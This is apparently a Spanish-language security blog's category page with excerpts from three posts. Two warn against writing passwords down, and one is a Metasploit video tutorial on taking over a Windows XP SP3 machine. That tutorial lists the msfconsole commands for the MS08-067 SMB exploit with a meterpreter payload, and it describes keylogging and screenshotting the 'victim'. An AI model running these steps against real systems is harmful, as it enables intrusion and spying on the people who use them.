Archivo de la categoría: Seguridad

Sección muy especial dedicada a cosas sobre seguridad informática…

Por eso siempre les digo que no anoten sus contraseñas…

Hace unos meses publiqué un post recomendándoles no anotar sus contraseñas en los clásicos post-it o en cualquier otro lugar y daba razones de por qué no hacerlo. Bien, en este post quiero platicarles una experiencia, afortunadamente no mía xD

Resulta que conozco a un Lic. en Informático (sin nombres para no revelar identidad xD) treinañero que tiene la mala costumbre de anotar todas las contraseñas. Tiene hojas de cálculo con información de a qué corresponde cada contraseña, sin protección alguna y siempre he recomendado no hacerlo, pero… No hace caso 😦

Hace unos días llegó contándome que le estaban robando recargas (tiene un ciber y ofrece recargas a celulares) y le pregunté que cómo estaba eso, el diálogo fue algo como sigue:

Lic. en Informática: Oye Tello no manches, me están robando recargas

Tello: :S y eso? cómo que le estan robando?

Lee el resto de esta entrada

Por favor, no anoten sus contraseñas :(

Esta entrada es sólo una opinión, una sugerencia…

En mis cortos 21 años y aun menos, 2 años que llevo en el rollo de la seguridad informática (o al menos queriéndome meter en esto) me he sorprendido de cuántas personas son muy descuidadas y exponen sus usuarios y contraseñas tan fácilmente.

Tan sólo en el último año varios conocidos me han pedido que les ayude a recuperar cuentas de hotmail o de facebook y cosas así. En los días pasados me pidieron (y como a 50 mas xD) que denunciara una cuenta de FB porque la habían robado y andaban haciendo un mal uso de ella.

Lee el resto de esta entrada

Videotutorial: Obtener un shell de un Windows XP SP3 aka Hackear un Xp usando Metasploit

Por esto es bueno tener siempre tu equipo actualizado, con antivirus, firewalls y mejor aún… Que no sea Windows xD al menos para dificultar un poco las cosas….

Esto es con fines educativos, el uso que se le de depende de cada persona u.u La computadora con la que hice el videotutorial es mía (aunque la está usando mi hermano) así que no he hecho nada malo u.u
¿Qué se va a hacer?
  • Obtener un shell de una máquina Windows XP con Service Pack 3 explotando el puerto 445
  • Iniciar un keylogger en la máquina víctima.
  • Ver procesos ejecutándose y cómo matarlos
  • Tomar capturas de pantalla de la víctima
  • Lo demás está en tu imaginación…. Puedes hacer lo que quieras, ya estás en la máquina víctima!! XD
¿Qué se necesita?
Una víctima =P, (ruby y rubygems requisito para Metasploit) y Metasploit

Comandos usados (para llegar al shell) en el videotutorial
# cd /opt/framework…/msf3
# ./msfconsole

> use exploit/windows/smb/ms08_067_netapi
>show options
>set rhost IP
>set payload windows/meterpreter/bind_tcp
>show options
>exploit

Ah y por cierto… una disculpa por la mala calidad… no supe usar mis editores de vídeo xD

Vídeo (ver en pantalla completa para mejor visibilidad de las letras):